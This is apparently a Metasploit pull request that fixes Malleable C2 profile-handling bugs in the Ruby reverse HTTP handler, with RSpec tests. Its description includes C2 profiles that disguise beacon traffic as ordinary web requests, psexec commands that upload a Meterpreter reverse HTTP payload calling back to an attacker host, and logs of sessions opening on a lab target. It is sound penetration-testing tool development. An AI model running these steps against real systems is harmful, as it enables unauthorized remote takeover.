### PR TITLE
Fix MalleableC2 Profile Handling Bugs

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -328,8 +328,8 @@ module ReverseHttp
   # the candidate, leave the candidate alone -- this is not a payload
   # request, and `process_uri_resource` will return nil for it.
   def unwrap_profile_uuid(candidate, placement)
-    prefix = placement.prepend.map{|d| d.args[0]}.join('')
-    suffix = placement.append.map{|d| d.args[0]}.join('')
+    prefix = placement.get_directive('prepend').map{|d| d.args[0]}.join('')
+    suffix = placement.get_directive('append').map{|d| d.args[0]}.join('')
 
     return candidate unless prefix.empty? || candidate.start_with?(prefix)
     return candidate unless suffix.empty? || candidate.end_with?(suffix)

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -395,7 +395,13 @@ module Msf::Payload::MalleableC2
 
     def method_missing(name, *args)
       name = name.to_s.gsub('_', '-')
-      get_section(name) || get_directive(name) || get_set(name)
+      section = get_section(name)
+      return section if section
+
+      directive = get_directive(name)
+      return directive if directive.any?
+
+      get_set(name)
     end
 
     def get_set(key)

--- a/spec/lib/msf/core/handler/reverse_http_spec.rb
+++ b/spec/lib/msf/core/handler/reverse_http_spec.rb
@@ -1,7 +1,7 @@
 require 'spec_helper'
+require 'tempfile'
 
 RSpec.describe Msf::Handler::ReverseHttp do
-
   def create_payload(info = {})
     klass = Class.new(Msf::Payload)
     klass.include described_class
@@ -15,8 +15,17 @@ RSpec.describe Msf::Handler::ReverseHttp do
     mod
   end
 
+  def parse_profile(contents)
+    Tempfile.create(['malleable-c2', '.profile']) do |file|
+      file.write(contents)
+      file.close
+
+      Msf::Payload::MalleableC2::Parser.new.parse(file.path)
+    end
+  end
+
   let(:datastore) do
-    {'LHOST' => '127.0.0.1'}
+    { 'LHOST' => '127.0.0.1' }
   end
 
   describe '#payload_uri' do
@@ -25,11 +34,10 @@ RSpec.describe Msf::Handler::ReverseHttp do
     end
 
     specify 'should be parseable as a URI' do
-      expect {
+      expect do
         URI.parse(payload_uri)
-      }.not_to raise_error
+      end.not_to raise_error
     end
-
   end
 
   describe '#stop_handler' do
@@ -77,9 +85,9 @@ RSpec.describe Msf::Handler::ReverseHttp do
       end
 
       specify 'should be parseable as a URI' do
-        expect {
+        expect do
           URI.parse(luri)
-        }.not_to raise_error
+        end.not_to raise_error
       end
 
       specify 'is a string' do
@@ -89,7 +97,6 @@ RSpec.describe Msf::Handler::ReverseHttp do
       specify 'keeps leading, removes trailing slash' do
         expect(luri).to eql('/asdf')
       end
-
     end
 
     context 'with a leading slash' do
@@ -98,9 +105,9 @@ RSpec.describe Msf::Handler::ReverseHttp do
       end
 
       specify 'should be parseable as a URI' do
-        expect {
+        expect do
           URI.parse(luri)
-        }.not_to raise_error
+        end.not_to raise_error
       end
 
       specify 'is a string' do
@@ -110,7 +117,6 @@ RSpec.describe Msf::Handler::ReverseHttp do
       specify 'maintains one slash' do
         expect(luri).to eql('/asdf')
       end
-
     end
 
     context 'with a trailing slash' do
@@ -119,9 +125,9 @@ RSpec.describe Msf::Handler::ReverseHttp do
       end
 
       specify 'should be parseable as a URI' do
-        expect {
+        expect do
           URI.parse(luri)
-        }.not_to raise_error
+        end.not_to raise_error
       end
 
       specify 'is a string' do
@@ -131,7 +137,6 @@ RSpec.describe Msf::Handler::ReverseHttp do
       specify 'adds leading, removes trailing slash' do
         expect(luri).to eql('/asdf')
       end
-
     end
 
     context 'just a slash' do
@@ -140,9 +145,9 @@ RSpec.describe Msf::Handler::ReverseHttp do
       end
 
       specify 'should be parseable as a URI' do
-        expect {
+        expect do
           URI.parse(luri)
-        }.not_to raise_error
+        end.not_to raise_error
       end
 
       specify 'is a string' do
@@ -153,7 +158,23 @@ RSpec.describe Msf::Handler::ReverseHttp do
         expect(luri).to eql('/')
       end
     end
-
   end
 
+  describe '#unwrap_profile_uuid' do
+    it 'returns the candidate unchanged when the placement omits prepend and append directives' do
+      payload = create_payload
+      candidate = 'Gp5X0AMBGjZIQElCIh7HQAHZgS6ps9'
+      profile = parse_profile(%q{
+        http-get {
+          client {
+            metadata {
+              parameter "id";
+            }
+          }
+        }
+      })
+
+      expect(payload.unwrap_profile_uuid(candidate, profile.http_get.client.metadata)).to eq(candidate)
+    end
+  end
 end

--- a/spec/lib/msf/core/payload/malleable_c2_spec.rb
+++ b/spec/lib/msf/core/payload/malleable_c2_spec.rb
@@ -1,12 +1,22 @@
 # frozen_string_literal: true
 
 require 'spec_helper'
+require 'tempfile'
 
 RSpec.describe Msf::Payload::MalleableC2 do
   let(:fixture_path) { File.join(Msf::Config.install_root, 'spec', 'file_fixtures', 'malleable_c2') }
 
   describe Msf::Payload::MalleableC2::Parser do
-    subject(:parser) { described_class.new }
+    subject(:parser) { Msf::Payload::MalleableC2::Parser.new }
+
+    def parse_profile(contents)
+      Tempfile.create(['malleable-c2', '.profile']) do |file|
+        file.write(contents)
+        file.close
+
+        parser.parse(file.path)
+      end
+    end
 
     describe '#parse' do
       context 'with minimal_uris_headers.profile' do
@@ -27,9 +37,9 @@ RSpec.describe Msf::Payload::MalleableC2 do
 
       context 'with a non-existent path' do
         it 'raises an exception' do
-          expect {
+          expect do
             parser.parse('/nonexistent/path.profile')
-          }.to raise_error(Errno::ENOENT)
+          end.to raise_error(Errno::ENOENT)
         end
       end
     end
@@ -39,6 +49,24 @@ RSpec.describe Msf::Payload::MalleableC2 do
         path = File.join(fixture_path, 'minimal_uris_headers.profile')
         profile = parser.parse(path)
         expect(profile.uris).to contain_exactly('/jquery-3.3.1.min.js', '/jquery-3.3.1.min.js/save')
+      end
+    end
+
+    describe Msf::Payload::MalleableC2::ParsedSection do
+      it 'returns a set value through method_missing when no matching directives exist' do
+        profile = parse_profile(%q{
+          http-get {
+            client {
+              set useragent "ScopedAgent/1.0";
+
+              metadata {
+                parameter "id";
+              }
+            }
+          }
+        })
+
+        expect(profile.http_get.client.useragent).to eq('ScopedAgent/1.0')
       end
     end
   end


### PR DESCRIPTION
## Description

This fixes two related bugs in the `6.5` Malleable C2 profile support (`lib/msf/core/payload/malleable_c2.rb`, `lib/msf/core/handler/reverse_http.rb`) that were found while testing example profiles for upcoming wiki documentation.

**Commit 1 -- `Fix a bug when handling profiles`:** `ParsedSection#method_missing` resolved names in the order `get_section(name) || get_directive(name) || get_set(name)`. Because `get_directive` always returns an array (never nil) and an empty array is truthy in Ruby, this short-circuited on `get_directive(name)` whenever a section had zero matching directives, so `get_set(name)` was never reached. Any `set key "value";` accessed through the implicit `method_missing` shorthand on a `ParsedSection` was effectively unreachable in that case. Fixed by only returning the directive list when it's non-empty, falling through to `get_set` otherwise.

**Commit 2 -- `Fix a crash when a profile's id/metadata section omits prepend/append`:** That first fix has a side effect: `method_missing` can now legitimately return `nil` (from `get_set`) for a name that matches no section, no directive, and no set key -- previously it always returned `[]` in that case. `Msf::Handler::ReverseHttp#unwrap_profile_uuid` called `placement.prepend.map{...}` / `placement.append.map{...}` without a nil guard, so any profile whose `http-get` `client.metadata` (or `http-post` `client.id`) block doesn't declare `prepend`/`append` -- a common, valid profile shape -- now crashes every incoming request with `NoMethodError: undefined method 'map' for nil` in the HTTP server's client-monitor thread. This silently prevents any session from ever being established. Fixed by switching to the existing `get_directive` accessor (which always returns an array), matching the pattern already used in `add_prepend_append_tlvs`.

**Related Issue:**

## Breaking Changes

None

## Reviewer Notes

Two independent, single-purpose commits -- review/revert them individually if useful. The second commit's bug only reproduces with a profile whose id/metadata placement section has no `prepend`/`append` directive, which the RSpec fixtures in `spec/file_fixtures/malleable_c2/` don't currently exercise on the handler side (only the parser).

## Malleable C2 Profiles Used for Verification

<details>
<summary>profile-1.txt</summary>

```
# Comment
set useragent "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)";

http-get {
    set uri "/jquery-3.3.1.min.js";

    client {
        header "Accept" "text/javascript, application/javascript";

        metadata {
            parameter "callback";
        }
    }

    server {
        header "Content-Type" "application/javascript; charset=utf-8";
    }
}
```

</details>

<details>
<summary>profile-2.txt</summary>

```
set useragent "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)";

http-get {
    set uri "/updates/check";

    client {
        header "Accept" "application/json";

        metadata {
            parameter "v";
        }
    }

    server {
        header "Content-Type" "application/octet-stream";

        output {
            base64;
            prepend "START_";
            append "_END";
        }
    }
}

http-post {
    set uri "/updates/report";

    client {
        header "Content-Type" "application/octet-stream";

        id {
            parameter "uid";
        }

        output {
            base64;
        }
    }

    server {
        header "Content-Type" "text/plain";
    }
}
```

</details>

## Verification Steps

1. - [ ] Against a Windows target reachable over SMB, configure `exploit/windows/smb/psexec` with the `profile-1.txt` profile above saved locally (e.g. `/tmp/profile-1.txt`):
   ```
   use exploit/windows/smb/psexec
   set RHOSTS <target-ip>
   set SMBUser <username>
   set SMBPass <password>
   set PAYLOAD windows/x64/meterpreter_reverse_http
   set TARGET Native upload
   set LHOST <attacker-ip>
   set LPORT 8080
   set MALLEABLEC2 /tmp/profile-1.txt
   run
   ```
2. - [ ] Confirm a Meterpreter session opens (`sessions -l`) and `~/.msf4/logs/framework.log` has no `NoMethodError`/`undefined method` entries for the run.
3. - [ ] Repeat steps 1-2 with `set MALLEABLEC2 /tmp/profile-2.txt` (the `profile-2.txt` content above) in place of profile-1.txt -- this is the profile that exercises the `http-post`/`id`/`output` base64 path fixed in commit 2.
4. - [ ] Confirm a session opens for profile-2.txt as well, with a clean log, same as step 2.

## Test Evidence

```
[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 45 modules:
    15 auxiliary modules
    13 exploit modules
    17 post modules
msf exploit(windows/smb/psexec) > 
msf exploit(windows/smb/psexec) > run MALLEABLEC2=/tmp/profile-1.txt
[*] Started HTTP reverse handler on http://192.168.159.128:8080/
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[!] 192.168.159.10:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.159.10:445 - Uploading payload... fRQaXgSP.exe
[*] 192.168.159.10:445 - Created \fRQaXgSP.exe...
[+] 192.168.159.10:445 - Service started successfully...
[*] 192.168.159.10:445 - Deleting \fRQaXgSP.exe...
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: umhktwc9) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: umhktwc9) Redirecting stageless: URI '/jquery-3.3.1.min.js' with UA 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' -> UUID Gp5X0AMBGjZIQElCIh7HQAHZgS6ps9_T_SxWcd9W4qAEXmHR9EoOiYuEuGJRKOByQ3wTQzEwpU
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: umhktwc9) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: umhktwc9) Attaching orphaned/stageless session...
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: umhktwc9) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (192.168.159.128:8080 -> 192.168.159.10:61109) at 2026-07-20 17:11:28 -0400

meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > run MALLEABLEC2=/tmp/profile-2.txt
[*] Started HTTP reverse handler on http://192.168.159.128:8080/
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[!] 192.168.159.10:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 192.168.159.10:445 - Uploading payload... cwhjPeNr.exe
[*] 192.168.159.10:445 - Created \cwhjPeNr.exe...
[+] 192.168.159.10:445 - Service started successfully...
[*] 192.168.159.10:445 - Deleting \cwhjPeNr.exe...
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: mbzjrd5l) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: mbzjrd5l) Redirecting stageless: URI '/updates/check' with UA 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' -> UUID 4CLZfDOfm2_K-sv4oKRF9ASbyWtwad6dDfIU9tgQ5dlS9tUfACLDoduZ3rtOVck4x0aM19VvSedJ9zbU7SD2ax0Qf3epu5f5l
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: mbzjrd5l) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: mbzjrd5l) Attaching orphaned/stageless session...
[!] http://192.168.159.128:8080/ handling request from 192.168.159.10; (UUID: mbzjrd5l) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (192.168.159.128:8080 -> 192.168.159.10:61113) at 2026-07-20 17:11:42 -0400

meterpreter > 
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | |
| **Target Software/Hardware** | |
| **Docker Image / Vagrant Setup** | |

## AI Usage Disclosure

Claude Code (Sonnet 5) was used to trace both root causes against the `6.5` source, apply both fixes, and draft this PR description. Root cause and fix were verified by the author via live testing.

## Pre-Submission Checklist

- [ ] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [ ] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [ ] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [ ] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)
